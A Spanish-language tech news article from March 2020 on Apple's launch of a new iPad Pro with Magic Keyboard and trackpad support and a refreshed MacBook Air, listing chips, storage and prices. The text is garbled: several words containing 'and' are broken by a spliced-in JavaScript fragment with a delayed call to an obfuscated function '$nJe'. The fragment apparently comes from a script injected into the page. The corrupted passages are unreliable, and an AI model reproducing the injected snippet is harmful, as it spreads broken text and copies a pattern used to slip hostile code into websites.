Apple revela nuevo Ipad PRO y Macbook Air

    Apple revela nuevo Ipad PRO y Macbook Air

    Por primera vez, el iPad cuenta con un teclado mejorado y soporte para mouse.

    Autor: Redacción Maxim 18 marzo, 2020


    FOTO: Apple

     

    Apple lo hizo oficial el 18 de marzo: están lanzandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando un nuevo iPad Pro, quizás una de sus actualizaciones más importantes para iPad, y un nuevo MacBook Air.

     

    Si bien necesariamente es discreto debido a la pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemia de Coronavirus que domina las noticias, el anuncio de Apple reveló una serie de nuevas actualizaciones tanto para tabletas como para computadoras portátiles, incluida una velocidad de procesamiento y memoria mejoradas.

     

    Si bien los videos recién lanzados de Apple destacan las mejoras en el iPad Pro, sus mejoras en MacBook Air no son menos impresionantes. Incluyen un nuevo teclado y una capacidad de almacenamiento duplicada, el modelo base a partir de 256 GB. El gigante de la electrónica con sede en Cupertino se jacta de que el Air tiene una capacidad gráfica mejorada: es un 80 por ciento más rápido que la generación anterior.

     

     

    El teclado mágico del MacBook Air se introdujo en el nuevo MacBook Pro más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande. Se ha reconfigurado tanto para la comodidad como para la estabilidad; esta última fue una gran queja de los usuarios con respecto a los modelos anteriores. Viene en oro, plata y gris espacial.

     

     

    Con el nuevo iPad Pro y el lanzamiento simultáneo de un nuevo Magic Keyboard, es bastante obvio que Apple está un paso más cerca de su objetivo de convertir la tableta en un verdadero reemplazo de computadora portátil. Supuestamente proporcionará la mejor experiencia de escritura de cualquier iPad, y el teclado desmontable ahora tiene un trackpad y soporte para mouse / trackpad en iPadOS 13.4.

     

     

     

    Técnicamente hablandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando, podrías operar tu iPad sin tocar la pantalla si optas por agregar el teclado.

     

    Las nuevas características adicionales del próximo Pro incluyen un chip A12Z Bionic ultrarrápido, que debería hacerlo más rápido que la mayoría de sus competidores de PC portátiles. También tiene un escáner LiDAR de detección de profundidad, micrófonos actualizados y una cámara ultra ancha. El LiDAR se integrará con las cámaras existentes y otros sensores para impulsar la experiencia de Realidad Aumentada (AR) a niveles surrealistas si funciona tan bien como Apple espera.

     

    Puedes solicitar el MacBook en la tienda web de Apple a partir del 18 de marzo de 2020 (todas las tiendas minoristas de Apple están actualmente cerradas debido a preocupaciones de Coronavirus), y el precio comienza en $ 999 dólares . El nuevo iPad Pro de 11 pulgadas comienza en $ 799 dólares, el de 12.9 pulgadas comienza en $ 999 dólares.

     

     

    DBS se adelanta y diseña este render con sus ideas para el nuevo IPHONE 12 Y SU IMPRESIONANTE DISEÑO 5G RESUMIDO EN UN VIDEO

     

    Temas relacionados con esta nota: , , , ,

Por primera vez, el iPad cuenta con un teclado mejorado y soporte para mouse.